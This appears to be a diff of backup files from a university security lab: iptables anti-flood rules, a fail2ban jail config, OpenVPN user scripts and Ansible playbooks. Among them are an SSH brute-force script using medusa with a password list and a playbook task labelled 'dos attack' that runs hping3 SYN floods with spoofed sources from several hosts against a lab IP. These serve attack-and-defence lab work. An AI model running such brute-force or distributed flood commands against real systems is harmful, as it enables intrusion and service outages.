172.21.0.4
172.21.0.5
172.21.0.6

54
backup_files/iptables_rules.sh
View File

@ -0,0 +1,54 @@
#!/bin/sh
### 1: Drop invalid packets
#iptables -t mangle -A PREROUTING -m conntrack --ctstate INVALID -j DROP
### 2: Drop TCP packets that are new and are not SYN ###
#iptables -t mangle -A PREROUTING -p tcp ! --syn -m conntrack --ctstate NEW -j DROP
### 3: Drop SYN packets with suspicious MSS value ###
#iptables -t mangle -A PREROUTING -p tcp -m conntrack --ctstate NEW -m tcpmss ! --mss 536:65535 -j DROP
### 4: Block packets with bogus TCP flags ###
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,SYN FIN,SYN -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,RST FIN,RST -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags FIN,ACK FIN -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,URG URG -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ACK,PSH PSH -j DROP
#iptables -t mangle -A PREROUTING -p tcp --tcp-flags ALL NONE -j DROP
### 5: Block spoofed packets ###
#iptables -t mangle -A PREROUTING -s 224.0.0.0/3 -j DROP
#iptables -t mangle -A PREROUTING -s 169.254.0.0/16 -j DROP
#iptables -t mangle -A PREROUTING -s 172.16.0.0/12 -j DROP
#iptables -t mangle -A PREROUTING -s 192.0.2.0/24 -j DROP
#iptables -t mangle -A PREROUTING -s 192.168.0.0/16 -j DROP
#iptables -t mangle -A PREROUTING -s 10.0.0.0/8 -j DROP
#iptables -t mangle -A PREROUTING -s 0.0.0.0/8 -j DROP
#iptables -t mangle -A PREROUTING -s 240.0.0.0/5 -j DROP
#iptables -t mangle -A PREROUTING -s 127.0.0.0/8 ! -i lo -j DROP
### 7: Drop fragments in all chains ###
#iptables -t mangle -A PREROUTING -f -j DROP
### 8: Limit connections per source IP ###
iptables -A INPUT -p tcp -m connlimit --connlimit-above 111 -j REJECT --reject-with tcp-reset
### 9: Limit RST packets ###
iptables -A INPUT -p tcp --tcp-flags RST RST -m limit --limit 2/s --limit-burst 2 -j ACCEPT
iptables -A INPUT -p tcp --tcp-flags RST RST -j DROP
### 10: Limit new TCP connections per second per source IP ###
iptables -A INPUT -p tcp -m conntrack --ctstate NEW -m limit --limit 60/s --limit-burst 20 -j ACCEPT
iptables -A INPUT -p tcp -m conntrack --ctstate NEW -j DROP
### 11:SYNPROXY
#iptables -t raw -A PREROUTING -p tcp -m tcp --syn -j CT --notrack
#iptables -A INPUT -p tcp -m tcp -m conntrack --ctstate INVALID,UNTRACKED -j SYNPROXY --sack-perm --timestamp --wscale 7 --mss 1460
#iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
### SSH brute-force protection ###
#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --set#iptables -A INPUT -p tcp --dport ssh -m conntrack --ctstate NEW -m recent --update --seconds 60 --hitcount 10 -j DROP

10
backup_files/medusa_script.sh
View File

@ -0,0 +1,10 @@
#!/bin/sh
sudo apt-get update -y # To get the latest package lists
sudo apt install medusa -y
cp /project/passwd_list.txt .
medusa -h 172.21.0.4 -u docker -P ./passwd_list.txt -M ssh -f -v 6

5276
backup_files/passwd_list.txt
View File

File diff suppressed because it is too large

2
backup_files/run.sh
View File

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory.yml test.yml -f 5 --ask-pass --ask-become-pass

8
backup_files/script_update.sh
View File

@ -0,0 +1,8 @@
#!/bin/sh
sudo apt-get update -y # To get the latest package lists
#sudo apt install hping3 -y
#hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.25.0.2

2
backup_files/second_script.sh
View File

@ -0,0 +1,2 @@
ansible-playbook -u docker -i inventory_w.yml test2.yml -f 4 --ask-pass --ask-become-pass

5
backup_files/test.retry
View File

@ -0,0 +1,5 @@
172.27.0.2
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6

112
backup_files/test.yml
View File

@ -0,0 +1,112 @@
---
- hosts: service
remote_user: docker
gather_facts: no
vars:
user: "docker"
tasks:
# make directory
- name: make dir for data
become: true
file:
path: "/var/lab/playground/playground-readmongo"
state: directory
owner: docker
group: docker
mode: '0777'
# make another directory
# - name: make another dir for data
# become: true
# file:
# path: "/home/docker/my_dir"
# state: directory
# owner: docker
# group: docker
# mode: '0777'
# pare google.com
# - name: google.com
# become: yes
# become_user: "{{ user }}"
# command: curl http://www.google.com
# ignore_errors: yes
# register: configwww
# - name: ls configwww
# debug: var=configwww.stdout_lines
# mk dir
# - name: remove dir
# become: yes
# become_user: "{{ user }}"
# command: rmdir new_dir
# ignore_errors: yes
# register: rmvdir
# - name: ls rmvdir
# debug: var=rmvdir.stdout_lines
# ls -al
- name: ls -al
become: yes
become_user: "{{ user }}"
command: ls -al #/etc
ignore_errors: yes
register: config
- name: ls config
debug: var=config.stdout_lines
# netstat -antlupe
# - name: netstat
# become: yes
# become_user: "{{ user }}"
# command: netstat -antlupe
# ignore_errors: yes
# register: ant
# - name: ls ant
# debug: var=ant.stdout_lines
# install hping3 to all
# - name: install hping3 to all
# become: yes
# become_user: "{{ user }}"
# command: sudo apt install hping3 -y
# ignore_errors: yes
# register: install_hp3
# - name: ls install_hp3
# debug: var=install_hp3.stdout_lines
- name: Refresh connection
meta: clear_host_errors

4
backup_files/test2.retry
View File

@ -0,0 +1,4 @@
172.27.0.3
172.27.0.4
172.27.0.5
172.27.0.6

48
backup_files/test2.yml
View File

@ -0,0 +1,48 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# ls -al test
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config
# - name: ls config
# debug: var=config.stdout_lines
# transfer script
- name: Transfer script.
copy: src=script_update.sh dest=/home/docker mode=0777
# exec script
- name: Exec script_update.
command: sh /home/docker/script_update.sh
# install hping3
- name: Ansible apt install hping3.
become: true
apt:
name: hping3
state: present
update_cache: true
# refresh
- name: Refresh connection
meta: clear_host_errors

4
backup_files/test3.retry
View File

@ -0,0 +1,4 @@
172.29.0.3
172.29.0.4
172.29.0.5
172.29.0.6

60
backup_files/test3.yml
View File

@ -0,0 +1,60 @@
---
- hosts: service
remote_user: docker
sudo: yes
gather_facts: no
vars:
user: "docker"
tasks:
# ls -al
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config2
# - name: ls config2
# debug: var=config2.stdout_lines
# dos attack async
- name: dos attack
command: sudo hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source 172.21.0.2 -y
async: 120
poll: 0
# ls -al
# - name: ls -al
# become: yes
# become_user: "{{ user }}"
# command: ls -al
# ignore_errors: yes
# register: config3
- name: ls config3
debug: var=config3.stdout_lines
- name: Refresh connection
meta: clear_host_errors

26
backup_files/vpn+backup/cr_vi_sec_vpn_my5.sh
View File

@ -0,0 +1,26 @@
#!/bin/bash
for i in {1..5}
do
#create user
NUM=$i
USERNAME=sec_vpn_$NUM
vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn
docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn
#change file of user ----if needed change ip in here----
NAME=sec_vpn_$NUM.ovpn
sudo sed -i '5,7d' ./$NAME
sudo sed -i '4 a comp-lzo' ./$NAME
sudo sed -i '5 a resolv-retry infinite' ./$NAME
sudo sed -i '6 a keepalive 15 60' ./$NAME
sudo sed -i '7 a remote-cert-tls server' ./$NAME
sudo sed -i '8 a remote 192.168.1.5 1194 udp' ./$NAME
sudo sed -i '9 a float' ./$NAME
done
cp sec_vpn_* ../test/project/

6
backup_files/vpn+backup/create-user.sh
View File

@ -0,0 +1,6 @@
USERNAME=sec2
vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn
docker run -v $vpn_data:/etc/openvpn --rm -it $docker easyrsa build-client-full $USERNAME nopass
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm $docker ovpn_getclient $USERNAME > $USERNAME.ovpn

47
backup_files/vpn+backup/create-vpn.sh
View File

@ -0,0 +1,47 @@
#!/bin/bash
IP=127.0.0.1 # Server IP
P=1194 # Server Port
OVPN_SERVER='10.80.0.0/16' # VPN Network
#vpn_data=/var/lib/swarmlab/openvpn/openvpn-services/ # Dir to save data ** this must exist **
vpn_data=$PWD/openvpn-services/
if [ ! -d $vpn_data ]; then
mkdir -p $vpn_data
fi
NAME=swarmlab-vpn-services # name of docker service
DOCKERnetwork=swarmlab-vpn-services-network # docker network
docker=registry.vlabs.uniwa.gr:5080/myownvpn # docker image
docker stop $NAME #stop container
sleep 1
docker container rm $NAME #rm container
# rm config files
rm -f $vpn_data/openvpn.conf.*.bak
rm -f $vpn_data/openvpn.conf
rm -f $vpn_data/ovpn_env.sh.*.bak
rm -f $vpn_data/ovpn_env.sh
# create network
sleep 1
docker network create --attachable=true --driver=bridge --subnet=172.50.0.0/16 --gateway=172.50.0.1 $DOCKERnetwork
#run container see ovpn_genconfig
docker run --net=none -it -v $vpn_data:/etc/openvpn -p 1194:1194 --rm $docker ovpn_genconfig -u udp://$IP:1194 \
-N -d -c -p "route 172.50.20.0 255.255.255.0" -e "topology subnet" -s $OVPN_SERVER
# create pki see ovpn_initpki
docker run --net=none -v $vpn_data:/etc/openvpn --rm -it $docker ovpn_initpki
# see ovpn_copy_server_files
#docker run --net=none -v $vpn_data:/etc/openvpn --rm $docker ovpn_copy_server_files
#create vpn see --cap-add=NET_ADMIN
sleep 1
docker run --detach --name $NAME -v $vpn_data:/etc/openvpn --net=$DOCKERnetwork --ip=172.50.0.2 -p $P:1194/udp --cap-add=NET_ADMIN $docker
sudo sysctl -w net.ipv4.ip_forward=1
#show created
docker ps

22
backup_files/vpn+backup/rm-user.sh
View File

@ -0,0 +1,22 @@
#!/bin/bash
CLIENTNAME=sec_vpn_
U=$CLIENTNAME
vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn
rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
rm -f $vpn_data/pki/private/$CLIENTNAME.key
rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
rm -f $vpn_data/server/ccd/$CLIENTNAME
rm -f $vpn_data/ccd/$CLIENTNAME
pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4)
rm -f $vpn_data/pki/certs_by_serial/$pem.pem
sed -i "/CN=$U$/d" $vpn_data/pki/index.txt
echo $pem
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove
rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn

30
backup_files/vpn+backup/rm_my5.sh
View File

@ -0,0 +1,30 @@
#!/bin/bash
for i in {1..5}
do
#delete my 5
NUM=$i
CLIENTNAME=sec_vpn_$NUM
U=$CLIENTNAME
vpn_data=$PWD/openvpn-services/
docker=registry.vlabs.uniwa.gr:5080/myownvpn
rm -f $vpn_data/pki/reqs/$CLIENTNAME.req
rm -f $vpn_data/pki/private/$CLIENTNAME.key
rm -f $vpn_data/pki/issued/$CLIENTNAME.crt
rm -f $vpn_data/server/ccd/$CLIENTNAME
rm -f $vpn_data/ccd/$CLIENTNAME
pem=$(sudo grep "CN=$U$" $vpn_data/pki/index.txt | cut -f4)
rm -f $vpn_data/pki/certs_by_serial/$pem.pem
sed -i "/CN=$U$/d" $vpn_data/pki/index.txt
echo $pem
docker run -v $vpn_data:/etc/openvpn --log-driver=none --rm -it $docker ovpn_revokeclient $CLIENTNAME remove
rm -f $vpn_data_user_config/$CLIENTNAME.ovpn
rm -f $vpn_data_user_config1/$CLIENTNAME.ovpn
#rm file from myfile
sudo rm ./$CLIENTNAME.ovpn
done

2
backup_files/vpn+backup/show-conn-user.sh
View File

@ -0,0 +1,2 @@
NAME=swarmlab-vpn-services # name of docker service
docker exec -it $NAME ovpn_listclients

2
backup_files/vpn+backup/show-user.sh
View File

@ -0,0 +1,2 @@
NAME=swarmlab-vpn-services # name of docker service
docker exec -it $NAME ovpn_listclients

16
backup_files/vpn+backup/vi-userfile.sh
View File

@ -0,0 +1,16 @@
#!/bin/bash
for j in {1..5}
do
NAME=sec_vpn_$j.ovpn
sudo sed -i '5,7d' /home/zoiros13/swarmlab-sec/vpn/$NAME
sudo sed -i '4 a comp-lzo' /home/zoiros13/swarmlab-sec/vpn/$NAME
sudo sed -i '5 a resolv-retry infinite' /home/zoiros13/swarmlab-sec/vpn/$NAME
sudo sed -i '6 a keepalive 15 60' /home/zoiros13/swarmlab-sec/vpn/$NAME
sudo sed -i '7 a remote-cert-tls server' /home/zoiros13/swarmlab-sec/vpn/$NAME
sudo sed -i '8 a remote 192.168.1.5 1194 udp' /home/zoiros13/swarmlab-sec/vpn/$NAME
sudo sed -i '9 a float' /home/zoiros13/swarmlab-sec/vpn/$NAME
done

899
backup_files/workingjail.local
View File

@ -0,0 +1,899 @@
#
# WARNING: heavily refactored in 0.9.0 release. Please review and
# customize settings for your setup.
#
# Changes: in most of the cases you should not modify this
# file, but provide customizations in jail.local file,
# or separate .conf files under jail.d/ directory, e.g.:
#
# HOW TO ACTIVATE JAILS:
#
# YOU SHOULD NOT MODIFY THIS FILE.
#
# It will probably be overwritten or improved in a distribution update.
#
# Provide customizations in a jail.local file or a jail.d/customisation.local.
# For example to change the default bantime for all jails and to enable the
# ssh-iptables jail the following (uncommented) would appear in the .local file.
# See man 5 jail.conf for details.
#
# [DEFAULT]
# bantime = 1h
#
# [sshd]
# enabled = true
#
# See jail.conf(5) man page for more information
# Comments: use '#' for comment lines and ';' (following a space) for inline comments
[INCLUDES]
#before = paths-distro.conf
before = paths-debian.conf
# The DEFAULT allows a global definition of the options. They can be overridden
# in each jail afterwards.
[DEFAULT]
#
# MISCELLANEOUS OPTIONS
#
# "ignorself" specifies whether the local resp. own IP addresses should be ignored
# (default is true). Fail2ban will not ban a host which matches such addresses.
#ignorself = true
# "ignoreip" can be a list of IP addresses, CIDR masks or DNS hosts. Fail2ban
# will not ban a host which matches an address in this list. Several addresses
# can be defined using space (and/or comma) separator.
#ignoreip = 127.0.0.1/8 ::1
# External command that will take an tagged arguments to ignore, e.g. <ip>,
# and return true if the IP is to be ignored. False otherwise.
#
# ignorecommand = /path/to/command <ip>
ignorecommand =
# "bantime" is the number of seconds that a host is banned.
bantime = 600
# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime = 30
# "maxretry" is the number of failures before a host get banned.
maxretry = 5
# "backend" specifies the backend used to get files modification.
# Available options are "pyinotify", "gamin", "polling", "systemd" and "auto".
# This option can be overridden in each jail as well.
#
# pyinotify: requires pyinotify (a file alteration monitor) to be installed.
# If pyinotify is not installed, Fail2ban will use auto.
# gamin: requires Gamin (a file alteration monitor) to be installed.
# If Gamin is not installed, Fail2ban will use auto.
# polling: uses a polling algorithm which does not require external libraries.
# systemd: uses systemd python library to access the systemd journal.
# Specifying "logpath" is not valid for this backend.
# See "journalmatch" in the jails associated filter config
# auto: will try to use the following backends, in order:
# pyinotify, gamin, polling.
#
# Note: if systemd backend is chosen as the default but you enable a jail
# for which logs are present only in its own log files, specify some other
# backend for that jail (e.g. polling) and provide empty value for
# journalmatch. See https://github.com/fail2ban/fail2ban/issues/959#issuecomment-74901200
backend = auto
# "usedns" specifies if jails should trust hostnames in logs,
# warn when DNS lookups are performed, or ignore all hostnames in logs
#
# yes: if a hostname is encountered, a DNS lookup will be performed.
# warn: if a hostname is encountered, a DNS lookup will be performed,
# but it will be logged as a warning.
# no: if a hostname is encountered, will not be used for banning,
# but it will be logged as info.
# raw: use raw value (no hostname), allow use it for no-host filters/actions (example user)
usedns = warn
# "logencoding" specifies the encoding of the log files handled by the jail
# This is used to decode the lines from the log file.
# Typical examples: "ascii", "utf-8"
#
# auto: will use the system locale setting
logencoding = auto
# "enabled" enables the jails.
# By default all jails are disabled, and it should stay this way.
# Enable only relevant to your setup jails in your .local or jail.d/*.conf
#
# true: jail will be enabled and log files will get monitored for changes
# false: jail is not enabled
enabled = false
# "mode" defines the mode of the filter (see corresponding filter implementation for more info).
mode = normal
# "filter" defines the filter to use by the jail.
# By default jails have names matching their filter name
#
filter = %(__name__)s[mode=%(mode)s]
#
# ACTIONS
#
# Some options used for actions
# Destination email address used solely for the interpolations in
# jail.{conf,local,d/*} configuration files.
destemail = root@localhost
# Sender email address used solely for some actions
sender = root@<fq-hostname>
# E-mail action. Since 0.8.1 Fail2Ban uses sendmail MTA for the
# mailing. Change mta configuration parameter to mail if you want to
# revert to conventional 'mail'.
mta = sendmail
# Default protocol
protocol = tcp
# Specify chain where jumps would need to be added in ban-actions expecting parameter chain
chain = <known/chain>
# Ports to be banned
# Usually should be overridden in a particular jail
port = 0:65535
# Format of user-agent https://tools.ietf.org/html/rfc7231#section-5.5.3
fail2ban_agent = Fail2Ban/%(fail2ban_version)s
#
# Action shortcuts. To be used to define action parameter
# Default banning action (e.g. iptables, iptables-new,
# iptables-multiport, shorewall, etc) It is used to define
# action_* variables. Can be overridden globally or per
# section within jail.local file
banaction = iptables-multiport
banaction_allports = iptables-allports
# The simplest action to take: ban only
#action_ = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
# ban & send an e-mail with whois report to the destemail.
action_mw = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
%(mta)s-whois[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", protocol="%(protocol)s", chain="%(chain)s"]
# ban & send an e-mail with whois report and relevant log lines
# to the destemail.
action_mwl = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
%(mta)s-whois-lines[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", logpath=%(logpath)s, chain="%(chain)s"]
# See the IMPORTANT note in action.d/xarf-login-attack for when to use this action
#
# ban & send a xarf e-mail to abuse contact of IP address and include relevant log lines
# to the destemail.
action_xarf = %(banaction)s[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
xarf-login-attack[service=%(__name__)s, sender="%(sender)s", logpath=%(logpath)s, port="%(port)s"]
# ban IP on CloudFlare & send an e-mail with whois report and relevant log lines
# to the destemail.
action_cf_mwl = cloudflare[cfuser="%(cfemail)s", cftoken="%(cfapikey)s"]
%(mta)s-whois-lines[name=%(__name__)s, sender="%(sender)s", dest="%(destemail)s", logpath=%(logpath)s, chain="%(chain)s"]
# Report block via blocklist.de fail2ban reporting service API
#
# See the IMPORTANT note in action.d/blocklist_de.conf for when to use this action.
# Specify expected parameters in file action.d/blocklist_de.local or if the interpolation
# `action_blocklist_de` used for the action, set value of `blocklist_de_apikey`
# in your `jail.local` globally (section [DEFAULT]) or per specific jail section (resp. in
# corresponding jail.d/my-jail.local file).
#
action_blocklist_de = blocklist_de[email="%(sender)s", service=%(filter)s, apikey="%(blocklist_de_apikey)s", agent="%(fail2ban_agent)s"]
# Report ban via badips.com, and use as blacklist
#
# See BadIPsAction docstring in config/action.d/badips.py for
# documentation for this action.
#
# NOTE: This action relies on banaction being present on start and therefore
# should be last action defined for a jail.
#
action_badips = badips.py[category="%(__name__)s", banaction="%(banaction)s", agent="%(fail2ban_agent)s"]
#
# Report ban via badips.com (uses action.d/badips.conf for reporting only)
#
action_badips_report = badips[category="%(__name__)s", agent="%(fail2ban_agent)s"]
# Report ban via abuseipdb.com.
#
# See action.d/abuseipdb.conf for usage example and details.
#
action_abuseipdb = abuseipdb
# Choose default action. To change, just override value of 'action' with the
# interpolation to the chosen action shortcut (e.g. action_mw, action_mwl, etc) in jail.local
# globally (section [DEFAULT]) or per specific section
action = %(action_)s
#
# JAILS
#
#
# SSH servers
#
[sshd]
enabled = true
maxretry = 3
bantime = 300
findtime = 30
# To use more aggressive sshd modes set filter parameter "mode" in jail.local:
# normal (default), ddos, extra or aggressive (combines all).
# See "tests/files/logs/sshd" or "filter.d/sshd.conf" for usage example and details.
#mode = normal
chain= INPUT
port = 22
logpath = %(sshd_log)s
backend = %(sshd_backend)s
action_ = iptables-multiport[name=%(__name__)s, bantime="%(bantime)s", port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
[dropbear]
port = ssh
logpath = %(dropbear_log)s
backend = %(dropbear_backend)s
[selinux-ssh]
port = ssh
logpath = %(auditd_log)s
enabled = true
#
# HTTP servers
#
[apache-auth]
port = http,https
logpath = %(apache_error_log)s
[apache-badbots]
# Ban hosts which agent identifies spammer robots crawling the web
# for email addresses. The mail outputs are buffered.
port = http,https
logpath = %(apache_access_log)s
bantime = 48h
maxretry = 1
[apache-noscript]
port = http,https
logpath = %(apache_error_log)s
[apache-overflows]
port = http,https
logpath = %(apache_error_log)s
maxretry = 2
[apache-nohome]
port = http,https
logpath = %(apache_error_log)s
maxretry = 2
[apache-botsearch]
port = http,https
logpath = %(apache_error_log)s
maxretry = 2
[apache-fakegooglebot]
port = http,https
logpath = %(apache_access_log)s
maxretry = 1
ignorecommand = %(ignorecommands_dir)s/apache-fakegooglebot <ip>
[apache-modsecurity]
port = http,https
logpath = %(apache_error_log)s
maxretry = 2
[apache-shellshock]
port = http,https
logpath = %(apache_error_log)s
maxretry = 1
[openhab-auth]
filter = openhab
action = iptables-allports[name=NoAuthFailures]
logpath = /opt/openhab/logs/request.log
[nginx-http-auth]
port = http,https
logpath = %(nginx_error_log)s
# To use 'nginx-limit-req' jail you should have `ngx_http_limit_req_module`
# and define `limit_req` and `limit_req_zone` as described in nginx documentation
# http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
# or for example see in 'config/filter.d/nginx-limit-req.conf'
[nginx-limit-req]
port = http,https
logpath = %(nginx_error_log)s
[nginx-botsearch]
port = http,https
logpath = %(nginx_error_log)s
maxretry = 2
# Ban attackers that try to use PHP's URL-fopen() functionality
# through GET/POST variables. - Experimental, with more than a year
# of usage in production environments.
[php-url-fopen]
port = http,https
logpath = %(nginx_access_log)s
%(apache_access_log)s
[suhosin]
port = http,https
logpath = %(suhosin_log)s
[lighttpd-auth]
# Same as above for Apache's mod_auth
# It catches wrong authentifications
port = http,https
logpath = %(lighttpd_error_log)s
#
# Webmail and groupware servers
#
[roundcube-auth]
port = http,https
logpath = %(roundcube_errors_log)s
# Use following line in your jail.local if roundcube logs to journal.
#backend = %(syslog_backend)s
[openwebmail]
port = http,https
logpath = /var/log/openwebmail.log
[horde]
port = http,https
logpath = /var/log/horde/horde.log
[groupoffice]
port = http,https
logpath = /home/groupoffice/log/info.log
[sogo-auth]
# Monitor SOGo groupware server
# without proxy this would be:
# port = 20000
port = http,https
logpath = /var/log/sogo/sogo.log
[tine20]
logpath = /var/log/tine20/tine20.log
port = http,https
#
# Web Applications
#
#
[drupal-auth]
port = http,https
logpath = %(syslog_daemon)s
backend = %(syslog_backend)s
[guacamole]
port = http,https
logpath = /var/log/tomcat*/catalina.out
[monit]
#Ban clients brute-forcing the monit gui login
port = 2812
logpath = /var/log/monit
[webmin-auth]
port = 10000
logpath = %(syslog_authpriv)s
backend = %(syslog_backend)s
[froxlor-auth]
port = http,https
logpath = %(syslog_authpriv)s
backend = %(syslog_backend)s
#
# HTTP Proxy servers
#
#
[squid]
port = 80,443,3128,8080
logpath = /var/log/squid/access.log
[3proxy]
port = 3128
logpath = /var/log/3proxy.log
#
# FTP servers
#
[proftpd]
port = ftp,ftp-data,ftps,ftps-data
logpath = %(proftpd_log)s
backend = %(proftpd_backend)s
[pure-ftpd]
port = ftp,ftp-data,ftps,ftps-data
logpath = %(pureftpd_log)s
backend = %(pureftpd_backend)s
[gssftpd]
port = ftp,ftp-data,ftps,ftps-data
logpath = %(syslog_daemon)s
backend = %(syslog_backend)s
[wuftpd]
port = ftp,ftp-data,ftps,ftps-data
logpath = %(wuftpd_log)s
backend = %(wuftpd_backend)s
[vsftpd]
# or overwrite it in jails.local to be
# logpath = %(syslog_authpriv)s
# if you want to rely on PAM failed login attempts
# vsftpd's failregex should match both of those formats
port = ftp,ftp-data,ftps,ftps-data
logpath = %(vsftpd_log)s
#
# Mail servers
#
# ASSP SMTP Proxy Jail
[assp]
port = smtp,465,submission
logpath = /root/path/to/assp/logs/maillog.txt
[courier-smtp]
port = smtp,465,submission
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[postfix]
# To use another modes set filter parameter "mode" in jail.local:
mode = more
port = smtp,465,submission
logpath = %(postfix_log)s
backend = %(postfix_backend)s
[postfix-rbl]
filter = postfix[mode=rbl]
port = smtp,465,submission
logpath = %(postfix_log)s
backend = %(postfix_backend)s
maxretry = 1
[sendmail-auth]
port = submission,465,smtp
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[sendmail-reject]
# To use more aggressive modes set filter parameter "mode" in jail.local:
# normal (default), extra or aggressive
# See "tests/files/logs/sendmail-reject" or "filter.d/sendmail-reject.conf" for usage example and details.
#mode = normal
port = smtp,465,submission
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[qmail-rbl]
filter = qmail
port = smtp,465,submission
logpath = /service/qmail/log/main/current
# dovecot defaults to logging to the mail syslog facility
# but can be set by syslog_facility in the dovecot configuration.
[dovecot]
port = pop3,pop3s,imap,imaps,submission,465,sieve
logpath = %(dovecot_log)s
backend = %(dovecot_backend)s
[sieve]
port = smtp,465,submission
logpath = %(dovecot_log)s
backend = %(dovecot_backend)s
[solid-pop3d]
port = pop3,pop3s
logpath = %(solidpop3d_log)s
[exim]
# see filter.d/exim.conf for further modes supported from filter:
#mode = normal
port = smtp,465,submission
logpath = %(exim_main_log)s
[exim-spam]
port = smtp,465,submission
logpath = %(exim_main_log)s
[kerio]
port = imap,smtp,imaps,465
logpath = /opt/kerio/mailserver/store/logs/security.log
#
# Mail servers authenticators: might be used for smtp,ftp,imap servers, so
# all relevant ports get banned
#
[courier-auth]
port = smtp,465,submission,imap,imaps,pop3,pop3s
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[postfix-sasl]
filter = postfix[mode=auth]
port = smtp,465,submission,imap,imaps,pop3,pop3s
# You might consider monitoring /var/log/mail.warn instead if you are
# running postfix since it would provide the same log lines at the
# "warn" level but overall at the smaller filesize.
logpath = %(postfix_log)s
backend = %(postfix_backend)s
[perdition]
port = imap,imaps,pop3,pop3s
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[squirrelmail]
port = smtp,465,submission,imap,imap2,imaps,pop3,pop3s,http,https,socks
logpath = /var/lib/squirrelmail/prefs/squirrelmail_access_log
[cyrus-imap]
port = imap,imaps
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
[uwimap-auth]
port = imap,imaps
logpath = %(syslog_mail)s
backend = %(syslog_backend)s
#
#
# DNS servers
#
# !!! WARNING !!!
# Since UDP is connection-less protocol, spoofing of IP and imitation
# of illegal actions is way too simple. Thus enabling of this filter
# might provide an easy way for implementing a DoS against a chosen
# victim. See
# http://nion.modprobe.de/blog/archives/690-fail2ban-+-dns-fail.html
# Please DO NOT USE this jail unless you know what you are doing.
#
# IMPORTANT: see filter.d/named-refused for instructions to enable logging
# This jail blocks UDP traffic for DNS requests.
# [named-refused-udp]
#
# filter = named-refused
# port = domain,953
# protocol = udp
# logpath = /var/log/named/security.log
# IMPORTANT: see filter.d/named-refused for instructions to enable logging
# This jail blocks TCP traffic for DNS requests.
[named-refused]
port = domain,953
logpath = /var/log/named/security.log
[nsd]
port = 53
action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp]
logpath = /var/log/nsd.log
#
# Miscellaneous
#
[asterisk]
port = 5060,5061
action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp]
%(mta)s-whois[name=%(__name__)s, dest="%(destemail)s"]
logpath = /var/log/asterisk/messages
maxretry = 10
[freeswitch]
port = 5060,5061
action = %(banaction)s[name=%(__name__)s-tcp, port="%(port)s", protocol="tcp", chain="%(chain)s", actname=%(banaction)s-tcp]
%(banaction)s[name=%(__name__)s-udp, port="%(port)s", protocol="udp", chain="%(chain)s", actname=%(banaction)s-udp]
%(mta)s-whois[name=%(__name__)s, dest="%(destemail)s"]
logpath = /var/log/freeswitch.log
maxretry = 10
# To log wrong MySQL access attempts add to /etc/my.cnf in [mysqld] or
# equivalent section:
# log-warning = 2
#
# for syslog (daemon facility)
# [mysqld_safe]
# syslog
#
# for own logfile
# [mysqld]
# log-error=/var/log/mysqld.log
[mysqld-auth]
port = 3306
logpath = %(mysql_log)s
backend = %(mysql_backend)s
# Log wrong MongoDB auth (for details see filter 'filter.d/mongodb-auth.conf')
[mongodb-auth]
# change port when running with "--shardsvr" or "--configsvr" runtime operation
port = 27017
logpath = /var/log/mongodb/mongodb.log
# Jail for more extended banning of persistent abusers
# !!! WARNINGS !!!
# 1. Make sure that your loglevel specified in fail2ban.conf/.local
# is not at DEBUG level -- which might then cause fail2ban to fall into
